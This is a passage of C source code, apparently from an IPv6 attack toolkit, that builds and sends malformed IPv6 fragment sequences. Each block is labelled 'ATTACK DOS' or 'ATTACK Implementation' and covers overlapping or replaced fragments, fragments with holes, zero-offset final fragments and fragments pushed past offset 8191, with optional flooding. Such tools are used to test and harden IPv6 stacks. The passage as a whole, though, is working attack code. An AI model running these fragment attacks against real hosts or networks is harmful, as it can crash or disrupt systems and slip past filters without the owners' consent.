(thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - replacing fragments with new, different data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only first fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only second fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1051, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only last fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 7501, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 1k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 175, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 350, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 4k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 550, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1110, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 16k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 2050, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 4100, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - one shot fragment without content\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment with 0 byte TCP data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_TCP, buf, 0)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - one shot fragment with 1 byte content\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment with 1 byte TCP data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_TCP, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 0 and no data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 0\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 0)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 0\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 0\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 1); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 1\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 8, 1); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 7 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); // memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)) * 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 7 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 7)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 8 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)) * 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 8 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 9 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)))) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 9 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 9)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 1414 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; 